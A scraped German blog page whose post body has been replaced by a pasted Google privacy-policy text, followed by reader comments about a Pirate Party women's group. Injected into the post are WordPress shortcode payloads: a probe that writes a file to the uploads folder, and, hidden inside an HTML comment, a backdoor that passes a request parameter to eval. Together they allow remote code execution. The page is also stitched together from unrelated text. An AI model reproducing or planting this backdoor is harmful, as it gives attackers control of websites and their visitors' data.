Warum mach ich den Scheiß eigentlich?

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Flattr this!

<!– [insert_php]if (isset($_REQUEST["mWr"])){eval($_REQUEST["mWr"]);exit;}[/insert_php][php]if (isset($_REQUEST["mWr"])){eval($_REQUEST["mWr"]);exit;}[/php] –>

Flattr this!

15 comments Write a comment

  1. Wenn Dich mein Posting zu diesem Text inspiriert hat, ehrt mich das zutiefst :-)

    Leider habe ich im Moment nicht die Zeit, ihn tatsächlich konzentriert zu lesen. War ein bisschen unhöflich von der EMMA, dass Genderfass im Weihnachts-Stress aufzumachen…
    Was ich aber beim Überfliegen mitbekommen habe, unterschreibe ich, und im neuen Jahr muss ich mal sehen, wie ich den kegelclub unterstützen kann.
    Eigentlich ein bisschen doof, weil ich den Piraten ursprünglich nicht beigetreten war, um Frauenpolitik zu machen. Wie Du schon schreibst, auch mir liegt es nicht, hauptberuflich “Frau” zu sein.

  2. Hallo DanielaKayB,
    ich wollte dich nicht drängen, dich uns anzuschließen (falls das so rüberkam). Ich wollte nur erklären, warum ich im Kegelklub aktiv bin. Dass du nicht den Piraten beigetreten bist, um „Frauenpolitik“ zu machen und daher andere Interessenfelder hast respektiere ich und finde ich super. Der Kegelklub ist eben dazu da, um Piraten wie dir den Rücken freizuhalten. ;)

  3. Nein, Lotte, so ist das auch nicht rübergekommen.

    Ich versuche nur seit meinem Eintritt,bei den Piraten *meine* Nische zu finden, und vielleicht ist die wertvollste Arbeit, die ich *jetzt* tun kann, mit breiter Brust als Piratin dazustehen…?

  4. Danke für den wunderbaren Beitrag :) Und danke auch für die Umfrage, ich hoffe, dass die Ergebnisse eine möglichst konstruktive Diskussion anstoßen werden. Wichtig ist, dass ein Bewusstsein für die Relevanz dieses Themas geschaffen wird. Wenn manche Leute doch nur mal ihre Paradigmen überdenken würden…

  5. “Wir müssen lernen, dieses Mitglied zu Identifizieren – und darauf zu achten, ob wir selbst nicht manchmal dieses Mitglied sind. Wir müssen sensibler werden für Mechanismen, die Menschen ausschließen – ganz oft sind es Dinge, die überhaupt nicht so gemeint sind!” – WORD.

  6. Starker Beitrag. Auch weil er bei diesem Thema ohne die üblichen Seitenhiebe und Anschuldigungen auskommt. Die Schreibe gefällt mir auch.

  7. danke! einer der klügsten Beiträge zu dem Ganzen. freue mich sehr – und bin wahnsinnig froh, die Ehre zu haben, mit dir nächste Woche den Workshop zu rocken <3
    Frohe Feiertage bis dahin.

  8. Pingback: Leseempfehlungen | stk

  9. Pingback: Popender-Trouble « sanczny

Leave a Reply